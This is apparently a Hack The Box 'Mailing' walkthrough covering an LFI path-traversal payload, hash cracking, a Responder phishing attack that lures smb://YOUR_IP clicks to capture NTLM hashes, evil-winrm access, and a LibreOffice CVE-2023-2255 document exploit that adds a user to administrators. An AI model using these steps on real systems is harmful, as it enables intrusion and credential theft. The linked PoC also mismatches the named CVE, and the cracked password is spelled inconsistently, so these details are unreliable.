You are currently viewing Mailing HTB Walkthrough
HTB Mailing (Easy) - Walkthrough

Mailing HTB Walkthrough

Hello hacker ! let’s see if we could hack this easy Windows machine named “Mailing” on hackthebox website and try to get the user and root flags.

As usual, we launch the scan with nmap to see if there’s any interesting ports.

1. nmap result

25/tcp  open  smtp          hMailServer smtpd
80/tcp  open  http          Microsoft IIS httpd 10.0
110/tcp open  pop3          hMailServer pop3d
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
587/tcp open  smtp          hMailServer smtpd
993/tcp open  ssl/imap      hMailServer imapd

After the scan is done, we can see that port 80 is open.

2. LFI

visiting http://mailing.htb and working on enumeration lead us to detect “LFI Vulnerability” in the “Download Instructions” button.

to exloit this LFI, we need to do a quick search on Google about “hmailserver config file location“, and we find the following location for the LFI :

http://mailing.htb/download.php?file=../../../../../../../../../../../../../../../../Program+Files%20(x86)/hmailserver/Bin/hmailserver.ini

########################################
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
##########################################

That’s Great ! i think we have a very useful information here : AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7

let’s try to crack this password using hashcat :

hashcat '841bb5acfa6779ae432fd7a4e6600ba7' -m 0 /usr/share/wordlists/rockyou.txt

Cracked password : homenetworingadministrator

3.Sending Email and Responder

After a lot of tries to exploit this machine, i wanted to try also the LLMNR Attack. as we know this machine name is “Mailing“, we are going to simulate that administrator send an email to maya in her mailing address maya@mailing.htb and maya will click a link to activate an LLMNR attack, so follow this steps :

  1. Connect to hmailserver using thunderbird and the credentials : “user : administrator@mailing.htb , passoword : homenetworingadministrator”
  2. Launch responder command : 
responder -I YOUR_INTERFACE
  1. Send those links below to maya and wait for responder :

smb://YOUR_IP
file://YOUR_IP
http://YOUR_IP
//YOUR_IP

After some minutes you should see the hash below : 


maya::MAILING:a24478abbe66f916:0611E814C639D2FC3CEF6D288E7F82AF:010100000000000000515EDA2FA1DA01710D8FAEAE9DE32F0000000002000800300032005400310001001E00570049004E002D004E004D0034004B003500560034004F0032003700300004003400570049004E002D004E004D0034004B003500560034004F003200370030002E0030003200540031002E004C004F00430041004C000300140030003200540031002E004C004F00430041004C000500140030003200540031002E004C004F00430041004C000700080000515EDA2FA1DA0106000400020000000800300030000000000000000000000000200000899E38003335C40705C9F685C8E218466AC5A3456C89945D147FA19AB152A7220A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00320030000000000000000000

That’s Great ! crack it with hashcat

hashcat mayahash  /usr/share/wordlists/rockyou.txt -m 5600

The cracked password is : m4y4ngs4ri

Now let’s move on and see if we can get our user flag

we connect using evil-winrm :

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

connected successfully and found flag in C:\Users\maya\Desktop

4. Exploitation and PrivEsc

First thing first we attempt to upload winpeas, but the antivirus deletes it.

Enumerating the hmailserver directory we found logs folder inside and we search for “AUTH PLAIN” because hamilserver use auth plain to authenticate.

get-content *.log | select-string -Pattern "AUTH PLAIN"

We find two Base64-encoded hashes :

echo "AGFkbWluaXN0cmF0b3JAbWFpbGluZy5odGIAaG9tZW5ldHdvcmtpbmdhZG1pbmlzdHJhdG9y" | base64 --decode

Decoded : administrator@mailing.htbhomenetworkingadministrator



echo "AHJ1eUBtYWlsaW5nLmh0YgBEbjZ6RjNjNXM3UjlMMW8y" | base64 --decode

Decoded : ruy@mailing.htbDn6zF3c5s7R9L1o2

We continue enumerating until we find in C:/program files “Libreoffice v7.4 we exploit it using CVE-2023-2255.py, try to check this very detailed POC about this CVE

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

checking net localgroup command :

net localgroup

There’s a group called “administradores”, we should add maya to this group for PrivEsc :

python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

we upload the file generated “exploit.odt” in C:/Important Documents and wait a moment before re-connecting with evil-winrm command again and get the root flag !

Finally we completed this easy windows machine, if something is not clear or if you have any suggestions please contact me Here.